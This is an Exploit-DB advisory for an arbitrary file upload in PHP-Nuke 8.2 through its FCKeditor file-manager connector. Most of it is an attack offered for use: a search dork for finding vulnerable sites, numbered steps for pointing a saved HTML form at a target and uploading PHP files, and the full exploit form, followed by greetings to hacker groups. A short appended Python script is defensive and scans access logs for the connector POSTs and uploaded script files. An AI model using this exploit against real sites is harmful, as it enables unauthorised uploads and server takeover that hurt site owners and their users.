PHP-Nuke 8.2 – Arbitrary File Upload

  • Author: Net.Edit0r
    Date: 2010-06-26
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/14058/
  • # Title : PHPnuke 8.2 Remote Upload File Exploit
    # Author : Net.Edit0r
    # Location : Iran
    # Dork : "POWERED BY PHPNUKE.IR"
    # Category : Remote
    # Email : Net.Edit0r@Att.net ~ Black.Hat.TM@Gmail.com
    # Special Thanks To : NetQurd (For help in finding bugs) > Email : NetQurd@Live.CoM
    
    [~]######################################### InformatioN
    #############################################[~]
    
    [~] 1.Save code html format
    
    [~] 2.Search Target.com
    
    [~] 3.Edit and replace & Target
    
    [~] 4.Save Html Page
    
    [~] 5.Open Page Html (Edite Source)
    
    [~] 6.Set Format PHP
    
    [~] 7.Choose File & Upload
    
    [~] 8.Formats can be uploaded (Html.Htm.Jpg.gif.Xml....)
    
    [~] 9.Target.com/images/uploads/File/File Name
    
    [~]######################################### ExploiT
    #############################################[~]
    
    [~] 1. Exploit File :
    
    <!--
    * FCKeditor - The text editor for Internet - http://www.Sun
    * Test page for the File Browser connectors.
    -->
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <title>FCKeditor - By Net.Edit0r</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    
    </head>
    <body>
    <table height="100%" cellspacing="0" cellpadding="0" width="100%"
    border="0">
    <tr>
    
    <td>
    <table cellspacing="0" cellpadding="0" border="0">
    <tr>
    <td>
    Connector:<br />
    <select id="cmbConnector" name="cmbConnector">
    <option value="asp/connector.asp" selected="selected">ASP</option>
    <option value="aspx/connector.aspx">ASP.Net</option>
    
    <option value="cfm/connector.cfm">ColdFusion</option>
    <option value="lasso/connector.lasso">Lasso</option>
    <option value="perl/connector.cgi">Perl</option>
    <option value="
    http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
    ">PHP</option>
    <option value="py/connector.py">Python</option>
    </select>
    
    </td>
    <td>
     </td>
    <td>
    Current Folder<br />
    <input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
    <td>
     </td>
    
    <td>
    Resource Type<br />
    <select id="cmbType" name="cmbType">
    <option value="File" selected="selected">File</option>
    <option value="Image">Image</option>
    <option value="Flash">Flash</option>
    <option value="Media">Media</option>
    
    <option value="Invalid">Invalid Type (for testing)</option>
    </select>
    </td>
    </tr>
    </table>
    <br />
    <table cellspacing="0" cellpadding="0" border="0">
    <tr>
    
    <td valign="top">
    <a href="#" onclick="GetFolders();">Get Folders</a></td>
    <td>
     </td>
    <td valign="top">
    <a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
    <td>
     </td>
    
    <td valign="top">
    <a href="#" onclick="CreateFolder();">Create Folder</a></td>
    <td>
     </td>
    <td valign="top">
    <form id="frmUpload" action="" target="eRunningFrame" method="post"
    enctype="multipart/form-data">
    File Upload<br />
    <input id="txtFileUpload" type="file" name="NewFile" />
    
    <input type="submit" value="Upload" onclick="SetAction();" />
    </form>
    </td>
    </tr>
    </table>
    <br />
    URL: <span id="eUrl"></span>
    </td>
    
    </tr>
    <tr>
    <td height="100%" valign="top">
    <iframe id="eRunningFrame" src="javascript:void(0)" name="eRunningFrame"
    width="100%"
    height="100%"></iframe>
    </td>
    </tr>
    </table>
    </body>
    </html>
    
    [~]######################################## ThankS To ...
    #########################################[~]
    
    [~] Special Thanks To My Best FriendS :
    
    NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ ,
    ~~XTerror~~ , __l2o5v4__ , Zend
    
    [~] IRANIAN Young HackerZ
    
    [~] GreetZ : Sun-Army.Org , Phc.Ir , Dark-tunnel.com , AttackerZ.IR
    
    [~]######################################### FinisH :D
    #############################################[~]
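
For defenders triaging a PHP-Nuke host, the following added example (not part of the original advisory) scans access-log lines for POSTs to the FCKeditor connector path and for successful fetches of script-type files under /images/uploads/, the two locations named above. The combined log format, the sample lines, and the extension list are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Both paths come from the advisory; case-insensitive match is an assumption.
CONNECTOR_RE = re.compile(r"/fckeditor/editor/filemanager/.*connectors?/", re.I)
UPLOAD_PREFIX = "/images/uploads/"
# Extensions a PHP-enabled server may execute (assumed list, tune per host).
SCRIPT_EXT = {"php", "php3", "php4", "php5", "phtml", "phar", "pht"}
# Apache/nginx "combined" log format is assumed.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def triage(lines):
    """Return (connector_posts, script_fetches, ips_seen_doing_both)."""
    posts, fetches = defaultdict(list), defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-HTTP line
        ip, method, target, status = m.groups()
        path = unquote(target.split("?", 1)[0])  # drop query, decode %xx
        if method == "POST" and CONNECTOR_RE.search(path):
            posts[ip].append(path)
        elif path.lower().startswith(UPLOAD_PREFIX) and status == "200":
            # Inspect every extension so names like "x.php.jpg" are flagged too.
            exts = path.rsplit("/", 1)[-1].lower().split(".")[1:]
            if SCRIPT_EXT.intersection(exts):
                fetches[ip].append(path)
    both = sorted(set(posts) & set(fetches))
    return dict(posts), dict(fetches), both

CONNECTOR = ("/includes/FCKeditor/editor/filemanager/browser/default/"
             "connectors/php/connector.php")
TS = "[26/Jun/2010:10:00:00 +0000]"
SAMPLE_LOG = [  # constructed lines using documentation IP ranges
    f'192.0.2.10 - - {TS} "POST {CONNECTOR} HTTP/1.1" 200 310 "-" "-"',
    f'192.0.2.10 - - {TS} "GET /images/uploads/File/notes.php HTTP/1.1" 200 42 "-" "-"',
    f'198.51.100.7 - - {TS} "GET /images/uploads/File/logo.jpg HTTP/1.1" 200 9001 "-" "-"',
    f'198.51.100.7 - - {TS} "GET /images/uploads/File/old.php HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    posts, fetches, both = triage(SAMPLE_LOG)
    print("connector POSTs:", posts)
    print("script fetches under uploads:", fetches)
    print("IPs with both:", both)
```

An IP that appears in both results is the strongest lead; a connector POST on its own still warrants checking whether the FCKeditor file manager should be reachable at all.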